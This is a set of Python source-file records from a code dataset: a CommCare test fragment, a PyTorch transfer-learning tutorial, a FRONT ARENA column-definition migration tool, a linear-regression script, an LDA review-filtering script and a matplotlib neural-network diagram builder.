),\n relationship='child',\n related_type='parent',\n identifier='parent',\n ),\n CaseIndex(\n CaseStructure(\n case_id=elizabeth_id,\n attrs={\n 'create': True,\n 'case_type': 'parent',\n 'case_name': 'Elizabeth SIMONDS',\n 'owner_id': 'b0b',\n 'external_id': 'elizabeth12',\n 'update': {\n 'first_name': 'Elizabeth',\n 'last_name': 'Simonds',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n ),\n relationship='child',\n related_type='parent',\n identifier='parent',\n )\n ],\n )\n )\n\n def test_case_indices(self):\n indices = self.johnny_case.indices\n self.assertEqual(len(indices), 1)\n\n case_accessor = CaseAccessors(DOMAIN)\n case = case_accessor.get_case(indices[0].referenced_id)\n self.assertTrue(are_cases_equal(case, self.elizabeth_case))\n\n\ndef are_cases_equal(a, b): # or at least equal enough for our test\n attrs = ('domain', 'case_id', 'type', 'name', 'owner_id')\n return all(getattr(a, attr) == getattr(b, attr) for attr in attrs)\n","sub_path":"corehq/form_processor/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44150826","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@author: gongxingfa\n@contact: xingfa.gong@wenba100.com\n@site: http://www.wenba100.com\n@software: PyCharm\n@file: transfer_learning.py\n@time: 2017/9/12 下午8:59\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport time\nimport copy\nimport os\n\ndata_transforms = {'train': transforms.Compose([\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n]),\n 'val': transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n}\n# train训练集;val:验证集\ndata_dir = 'hymenoptera_data'\ndsets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\ndset_loaders = {x: torch.utils.data.DataLoader(dsets[x], batch_size=4, shuffle=True, num_workers=4) for x in\n ['train', 'val']}\n\ndset_size = {x: len(dsets[x]) for x in ['train', 'val']}\ndset_classes = dsets['train'].classes\n\n\ndef imshow(inp, title=None):\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n plt.pause(0.001) # pause a bit so that plots are updated\n\n\n# Get a batch of training data\ninputs, classes = next(iter(dset_loaders['train']))\n\n# Make a grid from batch\nout = torchvision.utils.make_grid(inputs)\n\nimshow(out, title=[dset_classes[x] for x in classes])\n\n\ndef train_model(model, criterion, optimizer, lr_scheduler, num_epochs=25):\n since = time.time()\n best_model = model\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {0}/{1}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n for phase in ['train', 'val']:\n if phase == 'train': # 训练阶段\n optimizer = lr_scheduler(optimizer, epoch)\n model.train(True) # 设置model为训练模式\n else:\n model.train(False) # 设置model为评估模式\n running_loss = 0.0\n running_corrects = 0\n\n for data in dset_loaders[phase]:\n inputs, labels = data\n inputs, labels = Variable(inputs), Variable(labels)\n optimizer.zero_grad()\n\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n running_loss += loss.data[0]\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dset_size[phase]\n epoch_acc = running_corrects / dset_size[phase]\n print('{} loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n print()\n time_elapsed = time.time() - since\n print('Traning complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {.4f}'.format(best_acc))\n return best_model\n\n\ndef exp_lr_scheduler(optimizer, epoch, init_lr=0.001, lr_decay_epoch=7):\n \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"\n lr = init_lr * (0.1 ** (epoch // lr_decay_epoch))\n\n if epoch % lr_decay_epoch == 0:\n print('LR is set to {}'.format(lr))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n return optimizer\n\n\ndef visualize_model(model, num_images=6):\n images_so_far = 0\n fig = plt.figure()\n\n for i, data in enumerate(dset_loaders['val']):\n inputs, labels = data\n inputs, labels = Variable(inputs), Variable(labels)\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n\n for j in range(inputs.size()[0]):\n images_so_far += 1\n ax = plt.subplot(num_images // 2, 2, images_so_far)\n ax.axis('off')\n ax.set_title('predicted: {}'.format(dset_classes[preds[j]]))\n imshow(inputs.cpu().data[j])\n\n if images_so_far == num_images:\n return\n\n\nmodel_ft = models.resnet18(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 2)\n\ncriterion = nn.CrossEntropyLoss()\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\n num_epochs=25)\n","sub_path":"PyTorch_Tutorials/transfer_learning/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"328661614","text":"from __future__ import print_function\n\n\n\"\"\"----------------------------------------------------------------------------\nMODULE\n FColumnDefinitionUpgrade - Migrate FColumnDefinitions to FColumnAppearance\n\nDESCRIPTION\n\n\n (c) Copyright 2011 by SunGard FRONT ARENA. All rights reserved.\n\n----------------------------------------------------------------------------\"\"\"\n\nimport datetime\nimport sets\nimport re\n\nimport acm\n\nimport FExtensionUtils\nfrom FHTML import *\n\nmoved_column_attributes=sets.ImmutableSet(['Background', 'BkgFlash', 'BkgOrderBestInOrderBook',\\\n 'BkgOrderCanMatch', 'BkgOrderDeleted', 'BkgOrderDone',\\\n 'BkgOrderInactive', 'BkgOrderMoved',\\\n 'BkgOrgsOrderAsk', 'BkgOrgsOrderBid', 'BkgStripe', 'BkgTradeInactive',\\\n 'BkgTradersOrderAsk', 'BkgTradersOrderBid', 'BkgUserEdited', 'Text',\\\n 'TextDisconnected', 'TextFlash', 'TextPendingRefresh', 'ValueTruncate',\\\n 'ValueTruncation', 'Alignment', 'Flashing', 'FontBold', 'Font', 'FontSize'])\n\ndef write_report(fname, new_col_def, old_col_def, col_app, description): \n \"\"\"Produce HTML report of the changed colmn defintions\"\"\"\n \n res = [\"\"\" Changed column definition %s\n \"\"\" % (description,)] \n res.append(\"\"\"

Changed column definition %s

\"\"\" % (description,) )\n res.append(\"\"\"Produced on: %s

\"\"\" % (str(datetime.datetime.now())[0:19],) )\n res.append(\"\"\"By user: %s

\"\"\" % (acm.UserName(),) )\n res.append(\"\"\"ADS: %s

\"\"\" % (acm.ADSAddress(),) )\n res.append(\"\"\"The following changes have been made to the column definitions. \"\"\")\n res.append(\"\"\"The changes are not saved; \"\"\")\n res.append(\"\"\"hence, to keep them save the changed modules in the extension manager.

\"\"\")\n res.append(h2(\"Changed column definitions (total = %d)\"% (len(new_col_def) )))\n \n \n modules=sets.Set([col.module_name for col in new_col_def])\n new_col_def.sort()\n old_col_def.sort()\n \n while len(modules):\n active_mod=modules.pop()\n res.append(h3(\"[\" + active_mod + \"]\"))\n for col in new_col_def:\n if col.module_name == active_mod:\n res.append(ref(col.extension_name) + \", \")\n \n if len(new_col_def) == len(old_col_def):\n for i in range(len(new_col_def)):\n res.append(h3(anchor(new_col_def[i].extension_name)) )\n res.append(\"
\")\n res.append(h4(\"New column definition\"))\n res.append(\"\")\n res.append(h4(\"Old column definition\"))\n res.append(\"
\")\n for line in new_col_def[i].create_definition().split('\\n'):\n attr=re.match(r\" ([\\w]+)=([\\w /%\\-&]+)\", line)\n if attr and attr.groups()[0] == \"ColumnAppearance\":\n res.append(hilite(\"  ColumnAppearance=\"+ref(attr.groups()[1]) + \"
\"))\n else:\n res.append(line.replace(' ', \" \") + \"
\")\n res.append(\"
\")\n for line in old_col_def[i].create_definition().split('\\n'):\n attrb=re.match(r\" ([\\w]+)=.*\", line)\n if attrb and attrb.groups()[0] in moved_column_attributes:\n res.append(hilite(line.replace(' ', \" \") + \"
\"))\n else:\n res.append(line.replace(' ', \" \") + \"
\")\n res.append(\"
\")\n res.append(\"


\") \n \n res.append(h2(\"New ColumnAppearnce definitions\"))\n for app in col_app:\n res.append(h3(anchor(app.extension_name)))\n for line in app.create_definition().split('\\n'):\n res.append(line.replace(' ', \" \") + \"
\")\n res.append(\"
\")\n \n else:\n res.append(\"Data error\")\n \n res.append(\"\"\"\"\"\")\n outfile = open(fname, 'w')\n outfile.write(\"\".join(res))\n\n\ndef find_and_change_old_coldefs(modules):\n \n #Get all column definitions\n columns = FExtensionUtils.get_column_in_module(modules)\n\n #Find the columns that contains attributes that have been moved to column appearance\n columns_containing_moved_attributes =[item for item in columns \\\n if sets.Set(item.attribute_dictionary.keys()) & moved_column_attributes]\n \n #Make a copy of the list with column defintions\n old_column_def=[]\n for col in columns_containing_moved_attributes:\n old_column_def.append(FExtensionUtils.ColumnDefinition(col.module_name, col.class_name, col.extension_name, {}))\n for key in col.attribute_dictionary.keys():\n old_column_def[-1].attribute_dictionary[key] = col.attribute_dictionary[key]\n \n new_ColumneAppearances=[]\n dummy_context = acm.FExtensionContext()\n #Make the changes in the column defintions and column attributes\n for col_def in columns_containing_moved_attributes: \n if col_def.attribute_dictionary.has_key(\"ColumnAppearance\"):\n context = modules.get_context()\n columnAppearanceName = col_def.attribute_dictionary[\"ColumnAppearance\"]\n columnAppearance = FExtensionUtils.get_extensions(context, \"FColumnAppearance\", columnAppearanceName)\n \n newColumnAppearance = FExtensionUtils.ColumnDefinition.create_from_definition(columnAppearance) \n if not newColumnAppearance:\n #If the column appearance refered in the column definition does not exist, \n #we create a new empty one \n dummyColApp = \"[OldColDefs]FObject:ColumnAppearance =\\n \"\n newColumnAppearance = FExtensionUtils.ColumnDefinition.create_from_definition(dummyColApp) \n print (\"Not possible to create new column appearance based on \" + columnAppearanceName +\\\n \". Creating new empty column appearance.\")\n else:\n newColumnAppearance=FExtensionUtils.ColumnDefinition(col_def.module_name, \"FObject\", \"ColumnAppearance\", {})\n \n #Rename the column appearance\n newColumnAppearance.extension_name += '_' + col_def.extension_name.replace(' ', '_')\n col_def.attribute_dictionary[\"ColumnAppearance\"] = newColumnAppearance.extension_name\n #This while loop guranties that you don't override an existing ColumnAppearnce by adding an\n #underscore to the name while the column appearnce name exists\n while FExtensionUtils.get_extensions(modules.get_context(), \"FColumnAppearance\", newColumnAppearance.extension_name):\n newColumnAppearance.extension_name += '_'\n col_def.attribute_dictionary[\"ColumnAppearance\"] = newColumnAppearance.extension_name\n \n new_ColumneAppearances.append(newColumnAppearance) \n #Move the attributes from the column definition to the column apperance\n for key in(sets.Set(col_def.attribute_dictionary.keys()) & moved_column_attributes):\n newColumnAppearance.attribute_dictionary[key]=col_def.attribute_dictionary[key]\n del col_def.attribute_dictionary[key]\n \n #Apply the changes\n if acm.ShortVersion()[0:3]=='3.2':\n dummy_context.AddModule(col_def.module_name)\n dummy_context.EditImport(\"FColumnAppearance\", newColumnAppearance.create_definition(), 0)\n dummy_context.EditImport(\"FColumnDefinition\", col_def.create_definition(), 0)\n dummy_context.RemoveModule(col_def.module_name)\n else:\n dummy_context.AddModule(col_def.module_name)\n dummy_context.EditImport(\"FColumnAppearance\", newColumnAppearance.create_definition())\n dummy_context.EditImport(\"FColumnDefinition\", col_def.create_definition())\n dummy_context.RemoveModule(col_def.module_name) \n \n #Print report of the changes\n return columns_containing_moved_attributes, old_column_def, new_ColumneAppearances\n\ndef scan_contexts_and_report(context, users, reportname, write_summary_report):\n res = [h3(\"Old column definition type\")]\n remAttr = []\n for cont in context:\n print (\"Scanning context\", cont.StringKey(), \"for old column definition types\")\n if write_summary_report:\n report = reportname + \"_files\\\\UpgradeCol_\" + cont.StringKey() + \".html\"\n report_link = reportname[reportname.rfind(\"\\\\\")+1:] + \"_files\\\\UpgradeCol_\" + cont.StringKey() + \".html\"\n else:\n report = reportname + \"_UpgradeCol_\" + cont.StringKey() + \".html\"\n report_link = report\n modules = FExtensionUtils.get_modules(users, cont)\n columns_containing_moved_attributes, old_column_def, new_ColumneAppearances \\\n = find_and_change_old_coldefs(modules)\n if len(columns_containing_moved_attributes):\n remAttr.append((cont, len(columns_containing_moved_attributes)))\n write_report(report, columns_containing_moved_attributes,\\\n old_column_def, new_ColumneAppearances, \"in context \" + cont.StringKey())\n res.append(str(len(columns_containing_moved_attributes)))\n res.append(\" updated column definitions in context \")\n res.append(html_link(cont.StringKey(), report_link))\n res.append('
')\n if not remAttr:\n if write_summary_report:\n res.append(\"No old column definition type found in the scanned contexts
\")\n else:\n print (\"No old column definition type found in context\", context[0].StringKey())\n return None\n elif write_summary_report:\n sum = 0\n for attr in remAttr: sum += attr[1]\n res.append(\"Total \")\n res.append(str(sum))\n res.append(\" updated column definitions
\")\n else:\n return report\n return \"\".join(res)\n\ndef scan_modules_and_report(module, reportname, write_summary_report):\n print (\"Scanning modules for old column definition types...\")\n if write_summary_report:\n report = reportname + \"_files\\\\UpgradeCol_in_modules.html\"\n report_link = reportname[reportname.rfind(\"\\\\\")+1:] + \"_files\\\\UpgradeCol_in_modules.html\"\n else:\n report = reportname + \"_UpgradeCol_in_modules.html\"\n report_link = report\n modules = FExtensionUtils.get_moduleDict(module)\n columns_containing_moved_attributes, old_column_def, new_ColumneAppearances \\\n = find_and_change_old_coldefs(modules)\n if len(columns_containing_moved_attributes):\n write_report(report, columns_containing_moved_attributes,\\\n old_column_def, new_ColumneAppearances, \"in modules \" + modules.StringKey())\n res = [str(len(columns_containing_moved_attributes))]\n res.append(\" updated column definitions in the \")\n res.append(html_link(\"scanned modules\", report_link))\n res.append('
')\n res = \"\".join(res)\n if not write_summary_report:\n res = report\n elif write_summary_report:\n res = \"No old column definition type found in the scanned modules
\"\n else:\n res = None\n print (\"No old column definition type found in the scanned modules\")\n return res\n\n\n\n\n\n","sub_path":"Extensions/ExtensionToolMod/FPythonCode/FColumnDefinitionUpgrade.py","file_name":"FColumnDefinitionUpgrade.py","file_ext":"py","file_size_in_byte":11295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"386867362","text":"import pandas as pd\n\nx = [1.0, 1.6, 3.4, 4.0, 5.2]\ny = [1.2, 2.0, 2.4, 3.5, 3.5]\n\ndef lin_reg(a,b):\n xf= pd.array(a)\n yf= pd.array(b)\n\n def suma(a):\n sum = 0\n for i in range(len(a)):\n sum = a[i] + sum\n return sum\n xy = xf * yf\n x2 = xf*xf\n n = len(xf)\n\n a = ((n * suma(xy)) - (suma(xf) * suma(yf))) / ((n * suma(x2)) - (suma(xf) * suma(xf)))\n b = ((suma(yf) * suma(x2)) - (suma(xy) * suma(xf))) / ((n * suma(x2)) - (suma(xf) * suma(xf)))\n\n return a,b\n\nprint(lin_reg(x,y))\n","sub_path":"linreg.py","file_name":"linreg.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"58574066","text":"import csv\nimport os\n\nfrom langdetect import detect\nimport spacy\nimport nltk\nfrom nltk.corpus import stopwords\n\ncsvFileName = 'LDA_00_CorpusAnalysis_KeywordsTable_output_IMP.csv'\nkeywordsTable = list(csv.reader(open(csvFileName,encoding='utf-8'),delimiter=',')) # CSV file to 2 dimensional list of string\ncsvFileName = 'LDA_00_CorpusAnalysis_dctMaster.csv'\ndctMaster = list(csv.reader(open(csvFileName,encoding='utf-8'),delimiter=',')) # CSV file to 2 dimensional list of string\ndctWords = [dctMaster[i][0] for i in range(1,len(dctMaster)) if len(dctMaster[i][6]) == 2]\nprint(dctWords)\nkeywordsTableDe = []\nkeywordsTableEn = []\n\nnlpDe = spacy.load('de_core_news_sm')\nnlpEn = spacy.load(\"en_core_web_sm\")\n\nstop_words_en = stopwords.words('english')\nstop_words_de = stopwords.words('german')\n\ntokenizer = nltk.RegexpTokenizer(r\"\\w+\")\n\ndef unique(list1):\n # intilize a null list\n unique_list = []\n\n # traverse for all elements\n for x in list1:\n # check if exists in unique_list or not\n if x not in unique_list:\n unique_list.append(x)\n\n return unique_list\n\ndef germanSpacyLemmatizer(token):\n token = token.lower()\n lemmed = ''\n for t in nlpDe.tokenizer(token):\n lemmed = lemmed + ' ' + t.lemma_\n return lemmed.strip()\n\ndef englishSpacyLemmatizer(token):\n token = token.lower()\n lemmed = ''\n for t in nlpEn.tokenizer(token):\n lemmed = lemmed + ' ' + t.lemma_\n return lemmed.strip()\n\nkeywordsOutDe = []\nkeywordsOutEn = []\nfor j in range(len(keywordsTable)):\n for k in range(1,len(keywordsTable[j])):\n keyword = keywordsTable[j][k]\n keywordLang = keyword[0:3]\n keyword = keyword.replace('en:','').replace('de:','')\n itsGermanKeyword = True\n if keywordLang == \"en:\":\n itsGermanKeyword = False\n else:\n itsGermanKeyword = True\n if itsGermanKeyword == True:\n keyword = germanSpacyLemmatizer(keyword)\n keywordsTableDe.append(keyword)\n keywordsOutDe_temp = []\n keywordsOutDe_temp.append(keywordsTable[j][0])\n keywordsOutDe_temp.append(keyword)\n keywordsOutDe.append(keywordsOutDe_temp)\n else:\n keyword = englishSpacyLemmatizer(keyword)\n keywordsTableEn.append(keyword)\n keywordsOutEn_temp = []\n keywordsOutEn_temp.append(keywordsTable[j][0])\n keywordsOutEn_temp.append(keyword)\n keywordsOutEn.append(keywordsOutEn_temp)\n\nkeywordsTableEn = unique(keywordsTableEn)\nkeywordsTableDe = unique(keywordsTableDe)\ncsvFileNameOut = 'LDA_01_ReviewsPicker_keywordsEn.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter=',')\nfor c in range(len(keywordsOutEn)):\n csv_out.writerow(keywordsOutEn[c]) # + features)\ncsvFileNameOut = 'LDA_01_ReviewsPicker_keywordsDe.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter=',')\nfor c in range(len(keywordsOutDe)):\n csv_out.writerow(keywordsOutDe[c]) # + features)\n\nprint('Keywords files created.')\n\ndef reviewHit(review):\n fetchThis = False\n doc = review\n itsGerman = True\n try:\n if detect(doc) == 'en':\n itsGerman = False\n except:\n itsGerman = True\n\n doc = tokenizer.tokenize(doc)\n\n if itsGerman == True:\n for wd in doc:\n wd = wd.lower()\n if wd not in stop_words_de: # remove stopwords\n # stemmed_word = stemmerDe.stem(wd).lower() # stemming\n lemmed_word = germanSpacyLemmatizer(wd)\n if lemmed_word in dctWords:\n fetchThis = True\n return fetchThis\n else:\n continue\n else:\n for wd in doc:\n wd = wd.lower()\n if wd not in stop_words_en: # remove stopwords\n # stemmed_word = stemmerDe.stem(wd).lower() # stemming\n lemmed_word = englishSpacyLemmatizer(wd)\n if lemmed_word in dctWords:\n fetchThis = True\n return fetchThis\n else:\n continue\n\ncsvFileNameOut = 'LDA_01_ReviewsPicker_Master_Data_for_training.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter='|')\n\ndir = 'MasterData_160_companies/'\nfiles = [f for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]\nprint(files)\n\nfirstFile = True\ntotalReviews = 0\nfor f in range(len(files)):\n csvFileName = dir + files[f]\n masterData = list(csv.reader(open(csvFileName, encoding='utf-8'), delimiter='|')) # CSV file to 2 dimensional list of string\n\n if firstFile:\n csv_out.writerow(masterData[0]) # + features)\n firstFile = False\n\n # for i in range(1,len(masterData)):\n # review = masterData[i][9].strip()\n # # if (review != ''):\n # # csv_out.writerow(masterData[i])\n # # if ((masterData[i][7] == 'Gleichberechtigung' or masterData[i][7] == 'Umgang mit älteren Kollegen') and review != '') or reviewHit(review) == True:\n # # csv_out.writerow(masterData[i])\n # if reviewHit(review) == True and review != '':\n # csv_out.writerow(masterData[i])\n #\n # if i%100 == 0:\n # print(str(i) + \" reviews processed.\")\n\n for i in range(1,len(masterData),10):\n review = masterData[i][9].strip()\n bigReview = ''\n for j in range(i,i+10):\n bigReview = bigReview + ' ' + masterData[j][9].strip()\n masterData[i][9] = bigReview\n if (len(bigReview.strip()) > 50 and reviewHit(bigReview) == True):\n csv_out.writerow(masterData[i])\n totalReviews += 1\n # if ((masterData[i][7] == 'Gleichberechtigung' or masterData[i][7] == 'Umgang mit älteren Kollegen') and review != '') or reviewHit(review) == True:\n # csv_out.writerow(masterData[i])\n # if reviewHit(review) == True:\n # csv_out.writerow(masterData[i])\n\n if i%100 == 0:\n print(str(i) + \" reviews processed.\")\n\nprint('total reviews are', str(totalReviews))\n\n# csvFileNameOut = 'pickedReviews.csv'\n# csvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\n# csv_out = csv.writer(csvFileOut, delimiter='|')\n# csv_out.writerow(masterData[0][7:10]) # + features)\n\n# takes approx half hour to process 160 companies reviews","sub_path":"dataOCM/02_LDA/LDA_Runs/03_Selected/08092020_083631/LDA_01_ReviewsPicker_08092020_083631.py","file_name":"LDA_01_ReviewsPicker_08092020_083631.py","file_ext":"py","file_size_in_byte":6481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193413688","text":"import matplotlib\nmatplotlib.use(\"agg\")\nimport matplotlib.pyplot as plt # noqa: E402\nimport numpy as np # noqa: E402\nfrom PIL import Image # noqa: E402\nimport json\n\n# Get variables from vars.txt file\nf = open('public/vars.txt')\nvariables = json.load(f)\nf.close()\nBACKGROUND = variables[\"BACKGROUND\"]\nIMGBORDER = variables[\"IMGBORDER\"]\nEDGE = variables[\"EDGE\"]\nNEG_LINE_COLOR = variables[\"NEG_LINE_COLOR\"]\nPOS_LINE_COLOR = variables[\"POS_LINE_COLOR\"]\nDPI = variables[\"DPI\"]\n\n# This is an image that will be used to fill in the visualization blocks\n# for each node in the neural network. If we were to build an actual neural\n# network and attach it, we could use visualizations of the nodes instead.\nFILLER_IMAGE_FILENAME = \"public/input.png\"\n\n# Changing these adjusts the size and layout of the visualization\nFIGURE_WIDTH = 16\nFIGURE_HEIGHT = 6\nRIGHT_BORDER = 0.7\nLEFT_BORDER = 0.7\nTOP_BORDER = 0.8\nBOTTOM_BORDER = 0.6\n\nN_IMAGE_PIXEL_COLS = 64\nN_IMAGE_PIXEL_ROWS = 48\nN_NODES_BY_LAYER = [30, 25, 20, 10, 5, 10, 20, 30]\n\nINPUT_IMAGE_BOTTOM = 3\nINPUT_IMAGE_HEIGHT = 0.25 * FIGURE_HEIGHT\nERROR_IMAGE_SCALE = 0.7\nERROR_GAP_SCALE = 0.3\nBETWEEN_LAYER_SCALE = 0.8\nBETWEEN_NODE_SCALE = 0.4\n\nLINE_WIDTH_SCALER = 0.6\n\n\ndef main():\n \"\"\"\n Build a visualization of an image autoencoder neural network,\n piece by piece.\n A central data structure in this example is the collection of parameters\n that define how the image is laid out. It is a set of nested dictionaries.\n \"\"\"\n p = construct_parameters()\n fig, ax_boss = create_background(p)\n\n p = find_node_image_size(p)\n p = find_between_layer_gap(p)\n p = find_between_node_gap(p)\n p = find_error_image_position(p)\n\n filler_image = load_filler_image()\n image_axes = []\n add_input_image(fig, image_axes, p, filler_image)\n for i_layer in range(p[\"network\"][\"n_layers\"]):\n add_node_images(fig, i_layer, image_axes, p, filler_image)\n add_output_image(fig, image_axes, p, filler_image)\n add_error_image(fig, image_axes, p, filler_image)\n add_layer_connections(ax_boss, image_axes)\n save_nn_viz(fig)\n\n\ndef construct_parameters():\n \"\"\"\n Build a dictionary of parameters that describe the size and location\n of the elements of the visualization. This is a convenient way to pass\n the collection of them around .\n \"\"\"\n # Enforce square pixels. Each pixel will have the same height and width.\n aspect_ratio = N_IMAGE_PIXEL_COLS / N_IMAGE_PIXEL_ROWS\n\n parameters = {}\n\n # The figure as a whole\n parameters[\"figure\"] = {\n \"height\": FIGURE_HEIGHT,\n \"width\": FIGURE_WIDTH,\n }\n\n # The input and output images\n parameters[\"input\"] = {\n \"n_cols\": N_IMAGE_PIXEL_COLS,\n \"n_rows\": N_IMAGE_PIXEL_ROWS,\n \"aspect_ratio\": aspect_ratio,\n \"image\": {\n \"bottom\": INPUT_IMAGE_BOTTOM,\n \"height\": INPUT_IMAGE_HEIGHT,\n \"width\": INPUT_IMAGE_HEIGHT * aspect_ratio,\n }\n }\n\n # The network as a whole\n parameters[\"network\"] = {\n \"n_nodes\": N_NODES_BY_LAYER,\n \"n_layers\": len(N_NODES_BY_LAYER),\n \"max_nodes\": np.max(N_NODES_BY_LAYER),\n }\n\n # Individual node images\n parameters[\"node_image\"] = {\n \"height\": 0,\n \"width\": 0,\n }\n\n parameters[\"error_image\"] = {\n \"left\": 0,\n \"bottom\": 0,\n \"width\": parameters[\"input\"][\"image\"][\"width\"] * ERROR_IMAGE_SCALE,\n \"height\": parameters[\"input\"][\"image\"][\"height\"] * ERROR_IMAGE_SCALE,\n }\n\n parameters[\"gap\"] = {\n \"right_border\": RIGHT_BORDER,\n \"left_border\": LEFT_BORDER,\n \"bottom_border\": BOTTOM_BORDER,\n \"top_border\": TOP_BORDER,\n \"between_layer\": 0,\n \"between_layer_scale\": BETWEEN_LAYER_SCALE,\n \"between_node\": 0,\n \"between_node_scale\": BETWEEN_NODE_SCALE,\n \"error_gap_scale\": ERROR_GAP_SCALE,\n }\n\n return parameters\n\n\ndef create_background(p):\n fig = plt.figure(\n edgecolor=EDGE,\n facecolor=BACKGROUND,\n figsize=(p[\"figure\"][\"width\"], p[\"figure\"][\"height\"]),\n linewidth=4,\n )\n ax_boss = fig.add_axes((0, 0, 1, 1), facecolor=\"none\")\n ax_boss.set_xlim(0, 1)\n ax_boss.set_ylim(0, 1)\n return fig, ax_boss\n\n\ndef find_node_image_size(p):\n \"\"\"\n What should the height and width of each node image be?\n As big as possible, given the constraints.\n There are two possible constraints:\n 1. Fill the figure top-to-bottom.\n 2. Fill the figure side-to-side.\n To determine which of these limits the size of the node images,\n we'll calculate the image size assuming each constraint separately,\n then respect the one that results in the smaller node image.\n \"\"\"\n # First assume height is the limiting factor.\n total_space_to_fill = (\n p[\"figure\"][\"height\"]\n - p[\"gap\"][\"bottom_border\"]\n - p[\"gap\"][\"top_border\"]\n )\n # Use the layer with the largest number of nodes (n_max).\n # Pack the images and the gaps as tight as possible.\n # In that case, if the image height is h,\n # the gaps will each be h * p[\"gap\"][\"between_node_scale\"].\n # There will be n_max nodes and (n_max - 1) gaps.\n # After a wee bit of algebra:\n height_constrained_by_height = (\n total_space_to_fill / (\n p[\"network\"][\"max_nodes\"]\n + (p[\"network\"][\"max_nodes\"] - 1)\n * p[\"gap\"][\"between_node_scale\"]\n )\n )\n\n # Second assume width is the limiting factor.\n total_space_to_fill = (\n p[\"figure\"][\"width\"]\n - p[\"gap\"][\"left_border\"]\n - p[\"gap\"][\"right_border\"]\n - 2 * p[\"input\"][\"image\"][\"width\"]\n )\n # Again, pack the images as tightly as possible side-to-side.\n # In this case, if the image width is w,\n # the gaps will each be w * p[\"gap\"][\"between_layer_scale\"].\n # There will be n_layer nodes and (n_layer + 1) gaps.\n # After another tidbit of algebra:\n width_constrained_by_width = (\n total_space_to_fill / (\n p[\"network\"][\"n_layers\"]\n + (p[\"network\"][\"n_layers\"] + 1)\n * p[\"gap\"][\"between_layer_scale\"]\n )\n )\n\n # Figure out what the height would be for this width.\n height_constrained_by_width = (\n width_constrained_by_width\n / p[\"input\"][\"aspect_ratio\"]\n )\n\n # See which constraint is more restrictive, and go with that one.\n p[\"node_image\"][\"height\"] = np.minimum(\n height_constrained_by_width,\n height_constrained_by_height)\n p[\"node_image\"][\"width\"] = (\n p[\"node_image\"][\"height\"]\n * p[\"input\"][\"aspect_ratio\"]\n )\n return p\n\n\ndef find_between_layer_gap(p):\n \"\"\"\n How big is the horizontal spacing between_layers?\n This is also the spacing between the input image and the first layer\n and between the last layer and the output image.\n \"\"\"\n horizontal_gap_total = (\n p[\"figure\"][\"width\"]\n - 2 * p[\"input\"][\"image\"][\"width\"]\n - p[\"network\"][\"n_layers\"] * p[\"node_image\"][\"width\"]\n - p[\"gap\"][\"left_border\"]\n - p[\"gap\"][\"right_border\"]\n )\n n_horizontal_gaps = p[\"network\"][\"n_layers\"] + 1\n p[\"gap\"][\"between_layer\"] = horizontal_gap_total / n_horizontal_gaps\n return p\n\n\ndef find_between_node_gap(p):\n \"\"\"\n How big is the vertical gap between_node images?\n \"\"\"\n vertical_gap_total = (\n p[\"figure\"][\"height\"]\n - p[\"gap\"][\"top_border\"]\n - p[\"gap\"][\"bottom_border\"]\n - p[\"network\"][\"max_nodes\"]\n * p[\"node_image\"][\"height\"]\n )\n n_vertical_gaps = p[\"network\"][\"max_nodes\"] - 1\n p[\"gap\"][\"between_node\"] = vertical_gap_total / n_vertical_gaps\n return p\n\n\ndef find_error_image_position(p):\n \"\"\"\n Where exactly should the error image be positioned?\n 